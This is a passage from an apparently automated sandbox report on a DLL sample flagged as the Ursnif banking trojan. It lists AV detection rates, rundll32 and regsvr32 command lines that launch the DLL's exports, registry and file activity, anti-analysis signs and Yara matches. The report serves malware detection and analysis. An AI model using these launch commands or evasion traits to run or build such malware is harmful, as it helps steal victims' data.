                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: ~ .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: } .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: | .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: { .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: z .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: y .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: x .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: w .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: v .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: u .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: t .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: s .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: r .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: q .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: p .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: o .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: n .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: m .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: l .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: k .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: j .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: i .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: h .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: g .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: f .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: e .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: d .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: c .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: b .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: a .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: ` .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: _ .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: ^ .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: ] .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: [ .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: z .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: y .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: x .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: w .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: v .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: u .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: t .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: s .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: r .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: q .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: p .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: o .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: n .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: m .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: l .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: k .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: j .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: i .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: h .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: g .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: f .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: e .dllJump to behavior
                      Source: qT9Qk5aKTk.dll, Static PE information: Number of sections : 12 > 10
                      Source: qT9Qk5aKTk.dll, Virustotal: Detection: 80%
                      Source: qT9Qk5aKTk.dll, Metadefender: Detection: 59%
                      Source: qT9Qk5aKTk.dll, ReversingLabs: Detection: 82%
                      Source: qT9Qk5aKTk.dll, Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\loaddll32.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknown, Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\qT9Qk5aKTk.dll'
                      Source: C:\Windows\System32\loaddll32.exe, Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\qT9Qk5aKTk.dll',#1
                      Source: C:\Windows\System32\loaddll32.exe, Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\qT9Qk5aKTk.dll
                      Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\qT9Qk5aKTk.dll',#1
                      Source: C:\Windows\System32\loaddll32.exe, Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
                      Source: C:\Windows\System32\loaddll32.exe, Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Aquatically
                      Source: C:\Program Files\internet explorer\iexplore.exe, Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2760 CREDAT:17410 /prefetch:2
                      Source: C:\Windows\System32\loaddll32.exe, Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Episodically
                      Source: C:\Windows\System32\loaddll32.exe, Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Kakapo
                      Source: C:\Windows\System32\loaddll32.exe, Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Overdistantness
                      Source: C:\Windows\System32\loaddll32.exe, Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Pseudopodal
                      Source: C:\Program Files\internet explorer\iexplore.exe, Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2760 CREDAT:82962 /prefetch:2
                      Source: C:\Windows\System32\loaddll32.exe, Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Microphage
                      Source: C:\Windows\System32\loaddll32.exe, Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Cytost
                      Source: C:\Windows\System32\loaddll32.exe, Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Reattach
                      Source: C:\Windows\System32\loaddll32.exe, Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Vigia
                      Source: C:\Windows\System32\loaddll32.exe, Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Preallable
                      Source: C:\Windows\System32\loaddll32.exe, Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Amphistomous
                      Source: C:\Windows\System32\loaddll32.exe, Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,DllRegisterServer
                      Source: C:\Windows\System32\loaddll32.exe, Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Americanistic
                      Source: C:\Windows\SysWOW64\rundll32.exe, Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6840 -s 820
                      Source: C:\Windows\System32\loaddll32.exe, Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Suprahumanity
                      Source: C:\Windows\System32\loaddll32.exe, Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Eupyrchroite
                      Source: C:\Program Files\internet explorer\iexplore.exe, Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2760 CREDAT:17428 /prefetch:2
                      Source: C:\Windows\System32\loaddll32.exe, Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Splitbeak
                      Source: C:\Windows\SysWOW64\rundll32.exe, Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2736 -s 816
                      Source: C:\Program Files\internet explorer\iexplore.exe, Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2760 CREDAT:82974 /prefetch:2
                      Source: C:\Windows\System32\loaddll32.exe, Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Andirin
                      Source: C:\Windows\System32\loaddll32.exe, Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Drail
                      Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\qT9Qk5aKTk.dll',#1
                      Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\qT9Qk5aKTk.dll
                      Source: C:\Windows\System32\loaddll32.exe Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
                      Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Aquatically
                      Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Episodically
                      Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Kakapo
                      Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Overdistantness
                      Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Pseudopodal
                      Source: C:\Windows\System32\loaddll32.exe Process created: unknown unknown
                      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\qT9Qk5aKTk.dll',#1
                      Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2760 CREDAT:17410 /prefetch:2
                      Source: C:\Program Files\internet explorer\iexplore.exe Process created: unknown unknown
                      Source: C:\Windows\System32\loaddll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
                      Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{86DBC09F-1262-11EC-90E6-ECF4BB82F7E0}.dat
                      Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user~1\AppData\Local\Temp\~DF8A471FFBEDEC3971.TMP
                      Source: classification engine Classification label: mal92.troj.winDLL@62/162@17/8
                      Source: C:\Program Files\internet explorer\iexplore.exe File read: C:\Users\desktop.ini
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_02F9757F CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_02F9757F
                      Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2736
                      Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6840
                      Source: C:\Windows\SysWOW64\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\rundll32.exe Automated click: OK
                      Source: Window Recorder Window detected: More than 3 window changes detected
                      Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00402143 push ecx; ret 0_2_00402153
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_004020F0 push ecx; ret 0_2_004020F9
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_02F9EAE5 push ds; retf 0_2_02F9EAEB
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_02F9E4C9 push ecx; ret 0_2_02F9E4CA
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_02F9AD50 push ecx; ret 0_2_02F9AD59
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_02F9B10B push ecx; ret 0_2_02F9B11B
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_01360005 push dword ptr [ebp-0000027Ch]; ret 0_2_01360065
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_01360066 push dword ptr [ebp-0000027Ch]; ret 0_2_0136009B
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_01360397 push dword ptr [esp+0Ch]; ret 0_2_013603AA
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_01360397 push dword ptr [esp+10h]; ret 0_2_013603EF
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0136009C push dword ptr [ebp-0000027Ch]; ret 0_2_01360231
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0136009C push dword ptr [ebp-00000284h]; ret 0_2_01360284
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0136009C push dword ptr [esp+10h]; ret 0_2_01360396
                      Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_026D20F0 push ecx; ret 2_2_026D20F9
                      Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_026D2143 push ecx; ret 2_2_026D2153
                      Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_023EEAE5 push ds; retf 2_2_023EEAEB
                      Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_023EE4C9 push ecx; ret 2_2_023EE4CA
                      Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_023EB10B push ecx; ret 2_2_023EB11B
                      Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_023EAD50 push ecx; ret 2_2_023EAD59
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_031BB10B push ecx; ret 3_2_031BB11B
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_031BAD50 push ecx; ret 3_2_031BAD59
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_031BE4C9 push ecx; ret 3_2_031BE4CA
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_031BEAE5 push ds; retf 3_2_031BEAEB
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_029F009C push dword ptr [ebp-0000027Ch]; ret 3_2_029F0231
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_029F009C push dword ptr [ebp-00000284h]; ret 3_2_029F0284
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_029F009C push dword ptr [esp+10h]; ret 3_2_029F0396
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_029F0005 push dword ptr [ebp-0000027Ch]; ret 3_2_029F0065
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_029F0066 push dword ptr [ebp-0000027Ch]; ret 3_2_029F009B
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_029F0397 push dword ptr [esp+0Ch]; ret 3_2_029F03AA
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_029F0397 push dword ptr [esp+10h]; ret 3_2_029F03EF
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_035E009C push dword ptr [ebp-0000027Ch]; ret 5_2_035E0231
                      Source: qT9Qk5aKTk.dll Static PE information: section name:
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00401745 LoadLibraryA,GetProcAddress,0_2_00401745

                      Hooking and other Techniques for Hiding and Protection:

                      Yara detected Ursnif
                      Source: Yara match, File source: Process Memory Space: loaddll32.exe PID: 5004, type: MEMORYSTR
                      Source: Yara match, File source: Process Memory Space: regsvr32.exe PID: 5828, type: MEMORYSTR
                      Source: Yara match, File source: Process Memory Space: rundll32.exe PID: 1404, type: MEMORYSTR
                      Source: Yara match, File source: Process Memory Space: rundll32.exe PID: 4868, type: MEMORYSTR
                      Source: Yara match, File source: Process Memory Space: rundll32.exe PID: 7100, type: MEMORYSTR
                      Source: C:\Windows\SysWOW64\rundll32.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
                      Source: C:\Windows\System32\loaddll32.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\regsvr32.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4364 Thread sleep count: 35 > 30
                      Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4364 Thread sleep count: 33 > 30
                      Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4364 Thread sleep count: 44 > 30
                      Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4364 Thread sleep count: 39 > 30
                      Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4364 Thread sleep count: 42 > 30
                      Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4364 Thread sleep count: 31 > 30
                      Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4364 Thread sleep count: 43 > 30
                      Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4364 Thread sleep count: 49 > 30
                      Source: C:\Windows\SysWOW64\regsvr32.exe TID: 7680 Thread sleep time: -1667865539s >= -30000s
                      Source: C:\Windows\SysWOW64\regsvr32.exe TID: 7680 Thread sleep count: 32 > 30
                      Source: C:\Windows\System32\loaddll32.exe Last function: Thread delayed
                      Source: C:\Windows\SysWOW64\regsvr32.exe Last function: Thread delayed
                      Source: C:\Windows\SysWOW64\rundll32.exe Last function: Thread delayed
                      Source: C:\Windows\SysWOW64\regsvr32.exe Check user administrative privileges: GetTokenInformation, DecisionNodes
                      Source: C:\Windows\System32\loaddll32.exe Check user administrative privileges: GetTokenInformation, DecisionNodes
                      Source: C:\Windows\SysWOW64\rundll32.exe API coverage: 0.0 %
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_02F912D4 RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree
                      Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_023E12D4 RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree
                      Source: WerFault.exe, 00000023.00000002.429475012.0000000005347000.00000004.00000001.sdmp, WerFault.exe, 00000029.00000002.456974785.0000000004EC1000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
                      Source: WerFault.exe, 00000023.00000002.429022901.000000000531C000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW(
                      Source: WerFault.exe, 00000023.00000003.419054530.0000000005387000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAWK
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00401745 LoadLibraryA,GetProcAddress
                      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\qT9Qk5aKTk.dll',#1
                      Source: loaddll32.exe, 00000000.00000002.522901850.0000000001900000.00000002.00020000.sdmp, regsvr32.exe, 00000002.00000002.526447012.0000000002D40000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.527266541.00000000033E0000.00000002.00020000.sdmp, rundll32.exe, 00000013.00000000.343606007.0000000003920000.00000002.00020000.sdmp, rundll32.exe, 00000019.00000000.369950611.0000000002AE0000.00000002.00020000.sdmp, rundll32.exe, 00000021.00000002.526535175.00000000036E0000.00000002.00020000.sdmp Binary or memory string: uProgram Manager
                      Source: loaddll32.exe, 00000000.00000002.522901850.0000000001900000.00000002.00020000.sdmp, regsvr32.exe, 00000002.00000002.526447012.0000000002D40000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.527266541.00000000033E0000.00000002.00020000.sdmp, rundll32.exe, 00000013.00000000.343606007.0000000003920000.00000002.00020000.sdmp, rundll32.exe, 00000019.00000000.369950611.0000000002AE0000.00000002.00020000.sdmp, rundll32.exe, 00000021.00000002.526535175.00000000036E0000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
                      Source: loaddll32.exe, 00000000.00000002.522901850.0000000001900000.00000002.00020000.sdmp, regsvr32.exe, 00000002.00000002.526447012.0000000002D40000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.527266541.00000000033E0000.00000002.00020000.sdmp, rundll32.exe, 00000013.00000000.343606007.0000000003920000.00000002.00020000.sdmp, rundll32.exe, 00000019.00000000.369950611.0000000002AE0000.00000002.00020000.sdmp, rundll32.exe, 00000021.00000002.526535175.00000000036E0000.00000002.00020000.sdmp Binary or memory string: Progman
                      Source: loaddll32.exe, 00000000.00000002.522901850.0000000001900000.00000002.00020000.sdmp, regsvr32.exe, 00000002.00000002.526447012.0000000002D40000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.527266541.00000000033E0000.00000002.00020000.sdmp, rundll32.exe, 00000013.00000000.343606007.0000000003920000.00000002.00020000.sdmp, rundll32.exe, 00000019.00000000.369950611.0000000002AE0000.00000002.00020000.sdmp, rundll32.exe, 00000021.00000002.526535175.00000000036E0000.00000002.00020000.sdmp Binary or memory string: Progmanlock
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_02F9269C cpuid
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0040102F GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00401850 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_02F9269C RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree

                      Stealing of Sensitive Information:

                      Yara detected Ursnif

                      Remote Access Functionality:

                      Yara detected Ursnif
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 5004, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 5828, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 1404, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4868, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7100, type: MEMORYSTR
                      Source: Yara matchFile source: 25.2.rundll32.exe.510000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.0.rundll32.exe.510000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.rundll32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.0.rundll32.exe.510000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.0.rundll32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 33.2.rundll32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.47e0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 34.2.rundll32.exe.7b0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.2ba0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.0.rundll32.exe.32a0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.26d0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 27.2.rundll32.exe.49a0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.26d0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 33.2.rundll32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 38.2.rundll32.exe.610000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 30.2.rundll32.exe.29f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 44.2.rundll32.exe.29f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.0.rundll32.exe.3ef0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.rundll32.exe.920000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.0.rundll32.exe.3ef0000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.0.rundll32.exe.400000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 43.2.rundll32.exe.29f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.2cf0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.3610000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.1420000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.7f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 29.2.rundll32.exe.29f0000.0.raw.unpack, type: UNPACKEDPE
